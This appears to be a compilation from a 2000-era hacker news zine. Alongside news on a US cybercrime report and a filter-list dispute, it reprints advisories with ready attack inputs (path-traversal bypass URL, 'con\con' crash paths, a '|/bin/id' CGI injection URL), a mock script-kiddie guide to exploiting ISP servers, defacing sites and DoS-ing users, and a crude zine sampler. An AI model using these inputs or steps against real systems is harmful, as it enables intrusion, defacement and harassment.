Clinton administration said on Thursday that Internet businesses, many of which have long been suspicious of government regulation, need to cooperate with law enforcement to fight online crime. ``We are not asking businesses to be online cops. But we want them to be online neighborhood watch groups,'' Commerce Secretary William Daley said at a Justice Department news conference in releasing a report on unlawful Internet conduct. The 60-page report recommended more resources and training for law enforcement, urged greater promotion of cyberethics and concluded the existing laws should be adequate to protect against most unlawful online activities. The report by a working group led by Attorney General Janet Reno was requested by President Clinton in August last year. The report was essentially completed before last month's attacks that shut down some of the Web's most popular sites. The FBI has been investigating the attacks, but has yet to make any arrests or bring any charges in what officials admit could be a lengthy investigation. Daley said government and industry worked together on the Y2K problem. ``I think if companies can help nail hackers who threaten our networks, it's not just good for fighting crime, it's good for the future of e-commerce,'' he said. Businesses ``can do for the Internet what neighbors do for each other across the country, making communities safer by keeping an eye on each other. I think they should share their experiences and technologies with law enforcement,'' he said. ``Businesses must step up their own efforts to make the Internet more secure and not wait for cybercops to be expanded,'' Daley said. Reno acknowledged that some industry representatives had been concerned about government regulation, but said the distrust was beginning to vanish. ``I think there are still some -- perhaps it's a little like the wild West in the development of America -- who say, 'Let not let government be involved.' But there was also the marshals and Wyatt Earp and others who brought some order to it,'' she said. A leading civil liberties group said the report raised privacy concerns and warned that it could result in expanded police powers. The American Civil Liberties Union said in a letter to Reno that the report contained virtually no statistics on the extent of computer-related crime or whether such activity posed a truly significant threat to the nation. The ACLU objected to the report's description of anonymity of Internet users as a ``thorny issue.'' The ACLU said, ``An end to Internet anonymity would chill free expression in cyberspace and strip away one of the key structural privacy protections enjoyed by Internet users.'' -=- USA Today; http://www.usatoday.com/life/cyber/tech/cth524.htm Cybercrime report controversial By M.J. Zuckerman and Kevin Johnson, USA TODAY WASHINGTON -- Attorney General Janet Reno will release a report Thursday that seeks to expand the powers of law enforcement to conduct investigations in cyberspace. The report is already stirring controversy. The report is the product of a presidential working group that was appointed last summer. It amounts to a legislative wish list from law enforcement agencies that claim to be stymied by abuses involving new technology. "They make the assertion that there is all this illegal conduct on the Internet that they must investigate, but nowhere in the report do they show any numbers or proof," says Emily Whitfield of the American Civil Liberties Union, which asked Reno in a letter to reject the report's conclusions. A draft of the report was released last week. It drew criticism from the civil liberties community as well as many in the Internet community. The 59-page draft report wants to loosen restrictions on several technical, legal procedures that would make it easier to identify and track individual Internet users. "The report treats anonymity of Internet users as a 'thorny issue,' rather than a constitutional right," established in a Supreme Court case in 1995 that says the Constitution grants citizens the right to speak anonymously, the ACLU letter says. @HWA 153.0 HNN:Mar 10th:Symantec Wants List Removed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by knobdicker Symantec is pressing the ISP that hosts the Peacefire anti-censorware organization to remove content linking to a decrypted list of the thousands of sites blocked by I-Gear, Symantec's Internet-filtering software. Symantec claims that posting the decrypting software and site information is a EULA violation, which raises legal issues about software reverse engineering similar to the MPAA lawsuit over DVD DeCSS. (Symantec should be thankful for all the free testing instead of trying to quash what they see as bad press.) Wired http://www.wired.com/news/technology/0,1282,34842,00.html Peacefire http://www.peacefire.com Censorware Exposed Again by Chris Oakes 3:00 a.m. 9.Mar.2000 PST If you buy software to filter smut from the eyes of Web-savvy children, you might expect it to catch a few innocent sites in its electronic net. But you may be surprised if over half of those sites being blocked are on the list for no good reason. That's what anti-"censorware" organization Peacefire says it proved when it decrypted a list of the thousands of sites blocked by I-Gear, Internet-filtering software from software firm Symantec. "It shows how far people are willing to go in censoring people under 18 without applying critical examination of the tools," said Bennett Haselton, 21, who founded Peacefire in 1996 to promote "free access for the Net generation." Since then, Peacefire has frequently made a point of poking holes in the strategy of filtering Net content from youthful eyes in homes, libraries, and schools. "If [Symantec] hadn't taken time to pay an intern $10 for an hour's time to do what I did, it means they didn't care enough to take the time to improve their product," Haselton said. What Haselton did was develop a software utility that could decrypt the list of Web addresses blocked by I-Gear. Using the software himself, Haselton examined the first 50 addresses blocked in the category of sites ending in the .edu domain. Ostensibly blocked by I-Gear under "pornography," Haselton said the majority of the blocked sites didn't begin to fit the description. Symantec said that posting the decrypting software and site information violates the end-user license agreement that comes with its software. The company has asked the ISP that hosts Peacefire's Web pages to remove the link to the Symantec information. That argument, if it went to court, could face the same legal questions of "reverse engineering" coming into play in lawsuits over a utility that enables allegedly illegal playback of DVD discs on Linux computers. An overall analysis of the blocked sites produced a 76 percent error rate for I-Gear, Haselton said. These sites included a student site showing an experiment in which the face of model Cindy Crawford morphed into the face of Claudia Schiffer, and parts four and six of an academic analysis of the decline and fall of the Roman Empire. Another blocked page included a lengthy text written entirely in Latin. Peacefire deemed such sites "obvious errors," but also included in its evaluation "marginal errors." Such sites included a satirical look at growing up, entitled "How To Get By When You're Just As Dumb As Everyone Else, But Uglier." The site contained "some profanity," Peacefire said, but was not "pornographic" as categorized by I-Gear. Symantec Vice President Arthur Courville said Peacefire is acting illegally. "It was making part of our software available to the public in a manner that it was not suppose to be made available," and that violates the company's trade secrets and copyrights, said Courville, who also is Symantec's general counsel. Neither Peacefire nor its ISP has acted on Symantec's request. Courville wouldn't say whether the company planned to pursue the matter further. In 1997, another filtering software company, Solid Oak, threatened legal action against Peacefire for similar actions against its CyberSitter software, but never followed up on the threat. As for the allegedly error-ridden list exposed by Peacefire's actions, Symantec said what should and shouldn't be included in a list is often a matter of opinion. "The I-Gear product is infinitely configurable, so the user can set that to exclude everything on filter list[s], use portions, add or subtract individual sites," Courville said. "So it's really up to the end user. "Whenever dealing with a subject that covers as wide range of what we're talking about here, there are areas that people are going to have different opinions about." The product has approximately two dozen subject categories, he said, including crime, drugs, finance, sex, and nudity. Liza Kessler, staff counsel at the Center for Democracy & Technology, said that if its work is valid, Peacefire has once again proven the risk parents and administrators take when they rely on software to monitor their children's Internet use. "If consumers want this stuff they need to be able to make informed choices about what they're getting," Kessler said. "If these companies are not being truthful and someone exposes underlying truths of what is being censored, that provides a lot of additional information to consumers." It's not realistic for a company to expect the end user to review every site for relevance to a blocking category, Kessler said. Courville admitted that mistakes are "possible," as the list is processed in a combination of human and automatic review. As for the blocked Latin page, Courville speculated that the software's language-translation capabilities may have found something in the Latin text that qualified it under the pornographic categorization. Haselton guessed that something may have been the high frequency of the Latin word "cum." @HWA 154.0 Janet Reno and her commie crusade into a police state... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Here's the latest offal to be spewed from Janet's new proposal Constitutional protections of the press are getting in the way of computer investigations, and need to be eliminated, says Janet Reno. The Privacy Protection Act of 1980 protects American journalists, scholars and writers by prohibiting all law enforcement agencies from searching for or seizing "any work product materials" or any related "documentary materials....possessed by a person....with a purpose to disseminate to the public a newspaper, book, broadcast, or other similar form of public communication." Snarfed from Packetstorm, who wisely had this on their main page,its important news people!, she wants essentially to (for example) have access to all my data, probably wants a camera in my john too. I don't live in the U.S and i'm glad, since its turning more communist every day, especially if we let people like Reno get their way. Fight back... there's plenty of causes to pick up 'arms' against, here is yet another attack on our privacy and freedom. - Ed @HWA 155.0 FLYING: Xwindows game leaves files readable in system ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ March Archive Vulnerability: Any user can read any file in the system. title=Flying rev. 6.20 author=Helmut Hoenig system=tested on Redhat 5.2, possibly others foundby=grandpae@nconnect.net (Grampa Elite) Overview: Flying is a X-Windows program I have found installed on Redhat 5.2 that is actually a gateway for multiple games that Helmut wrote. All of these games unfortunatly write to /tmp/logfile.txt . Basicly all that you have to do is symlink logfile.txt to say /var/log/messages, and as soon as root runs his silly little game it overwrites logfile.txt with the file you symlinked it to, also it becomes owned by root and the symlink is turned off. The big but is that the read bit is left on allowing you to read the tmp file. Do I have anything better to do than find stupid tmp file holes in mostly unused games? No not really. @HWA 156.0 AIM messenger DoS ~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ March Archive As all Ascii-Symbols can be displayed in &#XXX; format, where XXX are numbers from 0-255, AIM seems not to check the XXX for higher values and some strings above 255 result in aim crashing completly or in part. E.g. the string ̂ will result in crashing the whole aim, but ̃ will crash only the instant message window (̃ was only tested once by me). It will crash the AIM of the attacker too, because AIM displays the string in the attacker-Instant Message, so the attacker-AIM also tries to convert it and errors. There is already an unofficial fix available, which can be downloaded at my hompage: http://laugh.at/cruz The fix is an edited ate32.dll, which should be copied to the aim directory. With it, aim doesnt try to convert "&#XXX;"-type of strings anymore, a minimum drawback (note: with that fix, the attacker can use this exploit to crash other unfixed AIMs, but wont crash his/her own AIM). Affected versions: I tested this only on 3.5+ versions of AIM, but all other versions are most likely affected too. -cruz http://laugh.at/cruz @HWA 157.0 Bypassing authentication on Axis StorPoint CD; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ March Archive From: "Vitek, Ian" Subject: Infosec.20000229.axisstorpointcd.a X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM Infosec Security Vulnerability Report No: Infosec.20000229.axisstorpointcd.a ====================================== Vulnerability Summary --------------------- Problem: Bypassing authentication on Axis StorPoint CD; By modifying an URL, outsiders can access administrator URLs without entering username and password Threat: Unauthorized access Platform: Axis StorPoint CD Axis StorPoint CD/T (Software Version 4.13) Solution: Upgrade to Software Version 4.28 Vulnerability Description ------------------------- CDs are available from the URL http://server/cd/ The configuration URL is: http://server/config/html/cnf_gi.htm This page is protected by a login and could contain very sensitive information. The login could be bypassed by the URL: http://server/cd/../config/html/cnf_gi.htm The server seems to check access permissions before URL conversion. Solution -------- Infosec and Axis recommends customers to upgrade their StorPoint Software. The current version is 4.28 and is not vulnerable to this attack. http://www.se.axis.com/techsup/cdsrv/storpoint_cd/index.html Additional Information ---------------------- The Axis StorPoint CD and StorPoint CD/T with Software Version 4.13 are old products with old software (from 1997). As Axis says: "Note that the development for StorPoint CD and CD/T has been discontinued from November 1999, only minor service releases will be available." Axis has tested their new products, Axis StorPoint CD E100 and StorPoint NAS 100, and this vulnerability was not been found. Recognition ----------- Infosec would like to thank Peter Berggren and Johan Diedrichs at Axis for their involvement with testing and supplying patch information. //Ian Vitek ian.vitek@infosec.se ------------------------------- Infosec is a Swedish based tigerteam that has worked with computer-related security since 1982 and done penetration tests and technical revisions since 1996. Infosec is now searching for co-workers. Call Blume on +46-8-6621070 for more information. @HWA 158.0 Securax advisory, various BSOD (Windows) problems. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ March Archive ===================================================================== Securax-SA-01 Security Advisory belgian.networking.security Dutch ===================================================================== Topic: Ms Windows '95/'98/SE will crash upon parsing special crafted path-strings refering to device drivers. Announced: 2000-03-04 Updated: 2000-03-05 Affects: Ms Windows'95, Ms Windows '98, Ms Windows '98 SE None affected: Ms Windows NT Server/Workstation 4.0 (sp5/6) Obsoletes: crash-ie.txt, win98-con.txt ===================================================================== THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE. PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ. THANK YOU, I. Background Local and Remote users can crash Windows '98 systems using special crafted path-strings that refer to device drivers being used. Upon parsing this path the Ms Windows OS will crash leaving no other option but to reboot the macine. With this all other running applications on the machine will stop responding. NOTE: This is not a bug in Internet Explorer, FTPd and other webserver software running Win95/98. It is a bug in the Ms Windows kernel system, more specific in the handling of the device drivers specified in IO.SYS, causing this kernel meltdown. II. Problem Description When the Microsoft Windows operating system is parsing a path that is being crafted like "c:\[device]\[device]" it will halt, and crash the entire operating system. Four device drivers have been found to crash the system. The CON, NUL, AUX, CLOCK$ and CONFIG$ are the two device drivers which are known to crash. Other devices as LPT[x]:, COM[x]: and PRN have not been found to crash the system. Making combinations as CON\NUL, NUL\CON, AUX\NUL, ... seems to crash Ms Windows as well. Calling a path such as "C:\CON\[filename]" won't result in a crash but in an error-message. Creating the map "CON", "CLOCK$", "AUX" "NUL" or "CONFIG$" will also result in a simple error-message saying: ''creating that map isn't allowed''. DEVICE DRIVERS -------------- These are specified in IO.SYS and date back from the early Ms Dos days. Here is what I have found. Here is a brief list; CLOCK$ - System clock CON - Console; combination of keyboard and screen to handle input and output AUX or COM1 - First serial communicationport COMn - Second, Third, ... communicationport LPT1 or PRN - First parallel port NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null. CONFIG$ - Unknown Any call made to a path consisting of "NUL" and "CON seems to crash routines made to the FAT32/VFAT, eventually trashing the kernel. Therefore, it is possible to crash -any- other local and/or remote application as long as they parse the path-strings to call FAT32/VFAT routines in the kernel. Mind you, we are -not- sure this is the real reason, however there are strong evidences to assume this is the case. So... To put it in laymen terms... It seems that the Windows98 kernel is going berserk upon processing paths that are made up of "old" (read: Ms Dos) device drivers. III. Reproduction of the problem (1) When receiving images into HTML with a path refering to [drive]:\con\con or [drive]:\nul\nul. This will crash the Ms Windows '98 Operatin System when viewing this HTML. This has been tested on Microsoft Outlook and Eudora Pro 4.2. Netscape Messenger seems not to crash. crashing IE (2) When using GET /con/con or GET /nul/nul using WarFTPd on any directory will also crash the operating system. Other FTPdaemons have not been tested. So it's possible to remotely crash Ms Windows '98 Operating Systems. We expect that virtually every FTPd running Windows '95/'98(se) can be crashed. (3) Inserting HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\_ open with the value of c:\con\con "%1" %* or c:\nul\nul "%1" %* will also crash the system. Think of what Macro virii can do to your system now. (4) It's possible to crash any Windows '95/'98(SE) machine running webserver software as Frontpage Webserver, ... You can crash the machine by feeding an URL as http://www.a_win98_site.be/nul/nul (5) Creating a HTML page with IMG tags or HREF tags refering to the local "nul" path or the "con" path. There are much more methods in crashing the Ms Windows Operating System but the essential part seems to be calling a path and file both refering to a device name, either NUl, CON, AUX, CLOCK$ or CONFIG$, with the objective of getting data on the screen using this path. As you may notice, crashing the system can be done remote or local. NETSCAPE - Netscape doesn't crash at first, because the string to call a path is changed to file:///D|/c:\nul\nul. Upon entering c:\nul\nul in the URL without file:///D|/ you -do- crash Netscape and the Operating System. III. Impact This type of attack will render all applications useless, thus leaving the system administrator no other option than rebooting the system. Due to the wide range of options how to crash the Ms Windows operating system, this is a severe bug. However, Windows NT systems don't seem to be vulnerable. IV. Solution Ms Windows NT 4.0 and 2000 aren't affected as well. We advice Windows'98 users to either upgrade to the systems specified as above, or not to follow html-links that refer to the device drivers specified as above. Microsoft has been notified. No official patch has been announced ( 2000-03-05 ). WORKAROUND: A simple byte hack could prevent this from happening as long as you don't use older Ms Dos programs making legitimate use of the device drivers. By replacing all "NUL", "AUX", "CON" "CLOCK$" and "CONFIG$" device driver strings with random values or hex null values. Mind you, upon hexediting these values, you must be aware that your system may become unstable. We have created a patch that alters the strings, after the patch we were no longer able to type in any commando's on the Ms-Dos prompt. The problem, however, was resolved. Because of this side-effect, we are -not- releasing the patch. It's up to you to decide if you want to change the bytes or not ( even with Ms Edit in binary mode you can quickly patch your IO.SYS ). V. Credits Initial "con" bug found in Internet Explorer by Suigien -*- Remote Crashing using FTPd, HTTPd, EMail, Usenet by Zoa_Chien Path0s, Necrite, Elias and ToSH -*- Byte hack IO.SYS workaround by Zoa_Chien -*- Advisory, IO.SYS exe/testing and aux/nul/clock$/config$ detection by vorlon. ===================================================================== For more information info@securax.org Website http://www.securax.org Advisories/Text http://www.securax.org/pers --------------------------------------------------------------------- @HWA 159.0 How to be a Script Kiddy by DrHamstuh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: DrHamstuh's HOW-TO for Linux Q:"How Do I Become A Hacker?" A: learn to code , install SunOS , get a SPARC , devote the rest of your life to computers and technology Q: well fuck that I'm lazy , how do i become a script kiddy? A: hmm I guess i can show you , whatever you do with this Info is your fault not mine... First things first , I am taking it you have Linux installed and a conection to the net. If you are still on Windows* [TM] (C) (R) then please look into getting a linux CD-ROM from www.cheapbytes.com install linux , setup PPP [if in redhat just startx and use netcfg pussy] and come back and read this again ... thanx -=-=-=-=- t0p s3kr3t 0nly l1nux k1ddyZ c4n r3ad bel0w th1z l1n3 -=-=-=-=- /* top secret hamstuh encryption */ JLKADJFLK;ASDFJLKSA;DJFLASK;DFJSLAKFJLAKSDFJLASKFJDLSKDJF * tools * mountd remote exploit code named remote expliot code imap remote exploit codes wu-ftpd remote exploit code Security Scanner. SSCAN by JSBACH listen remote exploit code q-pop remote exploit code ICQ bomber & flooder source code Denial Of Service code BitchX BitchX War Scripts * tools EOF * * general idea * Cause as much trouble with the tools you have as posible figure out what each tool does and how / why it works overall have fun with people and concider yourself better than them because you can use teardrop.c to freeze their windows computer or ADMmountd.c to break into their elite red hat 5.1 box * getting started * to get started first you have to be a able to walk , being able to walk is relative to this as being able to move around your operating system. if you are "hacking" from a linux box [ YAY ] then these commands will help you. mkdir = creates a dir mv = move , rename cp = copy rm = remove id = shows you who you are w = shows you who's logged in tail -f = lets you watch a file as text is added to it in real time echo = add's text to a file cd = changes your directory those are some of the basic's now you should be able to get started. =============================================================================== HOT TIP: make a dir in your base directory called .anythingsecret the . makes it not able to be shown to a regular ls , kind of hides it. HOT TIP: put all your "hacking" files in that .anythingsecret DIR keep everything clean and in order and it will be a ton easier to keep your thoughts 2gether and in the long run you may have more "r00t shellz" ----------------------------------------------------------------------------- "r00t shellz" : in my earlier days i was told by someone who had been on the scene for a long time , longer than i had that "root shells" are pretty much what you judge your eliteness on. ------------------------------------------------------------------------------ There are NO rules to being a script kiddy , and NO morlas are enforced upon you , your actions are your actions , and what you see fit to do will always be looked at by others and judged. ------------------------------------------------------------------------------ I want to.. A] hack shit now. B] get on IRC and learn more before i continue my life as a script kiddy C] change my mind and go get a sparc and be a real haxor if you said A then you have the mentality it takes to be a true script kiddy and im not going to hold you back any longer .. lets get started on talking about how to break into those krad red hat systems... If you just want to hack ANY computer on any network then i suggest just letting your Security Scanner scan for a long time and then picking the computers out of your scanners log file that look like you would be able to gain access to the easiest. [ mountd / named / imap ] If you are using SSCAN (tm) JSBACH, and are ready to hack some shit NOW. then start SSCAN running on some small town ISP.. ie: home@linux# ./sscan localisp.com/24 >> hot.list & once the scanning has completed then use your favorite word editor [PICO@#%] and read the file.. look for where SSCAN has told you that a server is mountd/imap/or named overflowable.. and then just try all the servers listed with the exploit that it is listed for... surely after a while one will work.. even the sun shines on a cluebie script kiddy's ass some day. [ gcc -o rotshb rotshb.c ] ./rotshb server.com 4 1 [ gcc -o mountd ADMmountd.c ] ./mountd server.com [ gcc -o imapk1ller imapexploit.c ] ./imapk1ller host.com offset you will now when your exploit worked and when you have root , and you will probally get a funny little feeling , kind of an exited feeling that will be your motovation to do this again.. now once you have root you are ready for the beef of a script kiddys life.... changing HTML.. a script kiddy changes HTML in many ways for many reasons.. the funnier hacks i have seen are hacks that are supose to be serious in which script kiddys voice their opinions on varios things .. from the soup at school not tasting good to the government just any opinion that they have in thier little brains .. [ find / -name index.html ] root@hackedbox# echo " i own you " >> /home/httpd/html/index.html now that you have defaced your first web page , get on IRC and brag about it , as a script kiddy its something that you HAVE to do.. load up BitchX and your War Script [ Civic.bx ] and head on over to TeenChat on EFNET.. scroll the URL to the page you just "hacked" and if anyone says anything negative to you say " Shut Up Bitch I Own You " and nuke them with /teardrop or any other elite d.o.s alias your war script may have.. you are now on your way to being a super ereet script kiddy.. by now you have probally allready caused a stir in the underground and JP from AntiOnline.com is going to interview you because you hacked the first jewish server that was ever ran off linux .. and now the pope thinks you are the anti-christ and has been talking about you as an evil haxer all week on the news.. JP see's a chance to exploit you and make money off your teen ignorance and does so in a gracefull manor. now your ego is larger then your IQ , you know how to root a server , you know how to D.o.S anyone on IRC , you are confident , you are clueless , you think you are a god , you have younger want to be script kiddys worshiping you , you are in the pinacle of your script kiddy life , now take your ICQ flooders / bombers and herass everyone on your ICQ list for no obvious reason.. you are now a Script Kiddy .. enjoy your new life of stupidity... in about a year you will realize that being a script kiddy is nothing but a waste of time.. and sure you have learnt your way around linux like a small town with only once street to pick up hookers , but you still have a long way to go before you are corprate material.. and once you decide computers are your dream and thats what you want to do for the rest of your life you notice that you wasted the last year and a half being a script kiddy .. inflating your teen ego .. hurting lil web servers for no reason other than the thrill of the hack.. heh ---- another uselss rant by DrHamstuh -- Unwritten man page: Understanding Linux thru better medication Maintained by Timothy Oleary @HWA 160.0 nfoSrch.cgi vulnerable to remote command execution ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by: ethO xploit: The following URL will exploit this vulnerability: http://www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id And experiment with variations thereof... # # This script was written by Renaud Deraison # # See the Nessus Scripts License for details # if(description) { name["english"] = "infosrch.cgi"; name["francais"] = "infosrch.cgi"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = "The 'infosrch.cgi' cgi is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious"; desc["francais"] = "Le cgi 'infosrch.cgi' est install�. Celui-ci poss�de un probl�me de s�curit� bien connu qui permet � n'importe qui de faire executer des commandes arbitraires au daemon http, avec les privil�ges de celui-ci (root ou nobody). Solution : retirez-le de /cgi-bin. Facteur de risque : S�rieux"; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "Checks for the presence of /cgi-bin/infosrch.cgi"; summary["francais"] = "V�rifie la pr�sence de /cgi-bin/infosrch.cgi"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison", francais:"Ce script est Copyright (C) 2000 Renaud Deraison"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # if(is_cgi_installed("infosrch.cgi")) { port = get_kb_item("Services/www"); if(!port)port = 80; { soc = open_sock_tcp(port); if(soc) { req = string("GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.0\r\n"); agent = string("User-Agent: Nessus\r\n\r\n"); data = req + agent; send(socket:soc, data:data); rep = recv(socket:soc, length:4096); if("uid=" >< rep)security_hole(port); close(soc); } } } @HWA 161.0 New magazine sampler: b0g #2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source:http://packetstorm.securify.com/mag/b0g/b0g-2.txt This is the February 2000 Issue. Official b0g site: http://www.b0g.org (Ed's note: site was down at time of writing, looks like someone didn't pay their bills...) Contact: irc in #k-rad on undernet By email: b0g@b0g.org Contributions can be sent to contribute@b0g.org * Formatting is AS-IS from the download site, unmodified. --------------------------------------------------------------------- _________________________________________ .-. _ .-. / \ | _____ | . o O| you make everyone else seem less perfect.| ( @ @ ) \________________________________________ / \ / \ --- / | | --- --- | i i | b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!# b0g w0rld d0minati0n! - br0therh00d 0f gimps g!#@!b0g!#@! b0g!#@!b0 the b0g newsletter! issue 2! February 2000! ph33r! @!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g @!b0g!#000 #@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@ g!#@!b0g!#@! b0g @!b0g!#0 @!b0g!#@!b0g!# 0g!#@ 0g! @!b0g! #@!b #@! b0g @!b0g!#0 g !b0g!#@!b0g!# 0g!#@ 0g @!b0g @!b0g @!b #@! b0g @!b0g!# 0g! b0g!#@!b0g!# 0g!# 0g @!b0 !#@!b0g! @!b #@! b0g @ !# 0g! b0g !# 0g b g!# 0 !# !b #@! b0g # 0g! b0 !# 0g b g!# !b !# !b #@! b0g !b # 0g! b0 @! !# 0g!# b0 #@!b g! !b0 !# !b #@! b0g @!b0 # 0g! b #@!b !# 0g!# b0 #@!b g! !b0 !# !b #@! b0g @!b0 # 0g! b #@!b !# 0g!# !b0 #@!b g! !b0 !# !b #@! b0g @!b0 # 0g! b #@!b !# 0 !b g! !b0 !# !b #@! b0g @!b0 # 0g! b #@!b !#@!b0 !b g! !b0 !# !b0g!#@! b0g @!b # 0g! b0 @! !#@!b0g! !b !#@!b g! !b !# !b0g!#@! b0g ! # g b !# 0g! @!b !#@!b g!# !b #@! b0g #@ !b0 !# 0g! @!b g!#@!b0 !#@!b0g!#@!b #@! b0g!#@!b0g!#@!b #@!b0g!#@!b !#@!b0g!#@!b0g!#@!b0 #@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0 !#@! !#@!b0g!#@!b0g!#@!b0g !#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0 !#@!b0g!#@!b0g!#@!b0g!# g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0 g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ :::::::::::::::::::::::: Table of contest! ::::::::::::::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 1 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::: Securing Corel Linux - Prae - prae@talk21.com ::::::::: ] [ b0g article # 2 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::: Guide to TCP/IP - redpriest - priest@hack3r.com ::::::::: ] [ b0g article # 3 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::::::: Sex0r guide - k-rad-bob - 808@c2i.net ::::::::::::: ] [ b0g article # 4 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::: Shell fun - some g1mp - abuse@microsoft.com ::::::::::: ] [ b0g article # 5 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::::::: TCL Guide - Prae - prae@talk21.com ::::::::::::::: ] [ b0g article # 6 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::: Obscene log - #gaydogsex - irc.undernet.org :::::::::: ] [ b0g article # 7 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::::::: grannanizing - Prae - prae@talk21.com ::::::::::::: ] [ b0g article # 8 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::: Satanism - Vegtam - vegtam@fjell.online.no ::::::::: ] [ b0g article # 9 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::::::: Negr/OS - dialect - dialect@home.com ::::::::::::: ] [ b0g article # 10 ::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::::::: irc quotes - misc - irc.undernet.org ::::::::::::: ] [ b0g article # 11 ::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::: notes from the editor � k-rad-bob � 808@c2i.net :::::::: ] This months issue is sponsored by Kurder King! [ eat a turkey! ] [ if you cant see the image properly, squint your eyes!@$ ] ___ __waaaaxx|x_w___, _ .._?^-_auZ*"^^Ou =] = "'_= _/`x_xd&?`l .ll_________ l ."_,x __`|jdU7^ l_uOO3O3O33OO4UGa_UO"34s_l =|"\,x _^`_dO?~ l_||u4O3333333O333333OOO|l |33ns.x =0",u _+ |dU?` _j-|OOO333O3O3O333O3O3O333?l_jO3O33: =3J_ -pu|d4Y _3+l4O3333O3333O33O3333O3O%3?"~ __ __ l\l _-_X4X^ lx?l|O333O3333O3333]"?"-l __auO44 OOO2%34Oi -x+ lxX4< 03Ol|43O3O33O%?~- __aZ4n_, 44O2 3OO 0OOi M jOOM xO3|4O2"~ll. __ __ |4O3??4O. 4XO3aud 34OndOX 4< OO< -?"-l= __ OOO2%34Oi |dOG 44i 4XOX OOO73OOOs. J= O] _aa j3OX 3OO 0OOi |dO3 ldO< 4dOnaaa 3OO; "*33P- .4 X| ljO %OO |dO3 34OndOX |dO3aXOO< 4XOO42% mX3 0 } _a3 _jOO %OO j3O3 OOO73OOOs."33OO]?' __u4OOOOOOOOC; l 4OO _UOO -%OO |dO2 3OO; "*33P- -~- - __ud2 _wZO4OOOX3333O]+ : OOOO4OOn. %OOs.jOO mX3` a_a_l |jOOO3 dOOOO2 l OOO%?OOOOn 4OOO42P aju= OOOOOX=- =|4OO :%OOOOO |uu3OOO2; l OOO] ""4OO -0___u uOO3Oc OOOOOOOG=3xOOOC OOOOO% MXOXOOO3; : OOON ""- qd4O4s 4OOOOc OOOOOOOOOgd3OOC OOOOOOi 0|OOO3; i M^l __a%< w4OOOm~ 4OOOOc OOOO33OOO3OOOOC "OOOOOOXuuO4OOOr! i O4OO3; jOOOO7^ 4OOOOc OOOO] *3OOOOOOC ""X3OOOOOOO37~ X OOOO3=dOOOOE 4OOOOc OOOO] *OOOOOC "~~~~ll >*s.qi] Ow| OOOOOOOOOOi. 4OOOOc OOOO] - M333` 3:>VxHEl O4;. OOOOOOOOOOOG;O. 4O3OOc OOO2- .-- _a]%O333~?O3: jq_,= 0 O44_= OOOO3;"XOOOOOZ; OOOO3- =l_j|dOO3O33333vWlx]` |_ZO44Zo_0uw OOO4;. OOOO3; lMOOOOO] X^~l 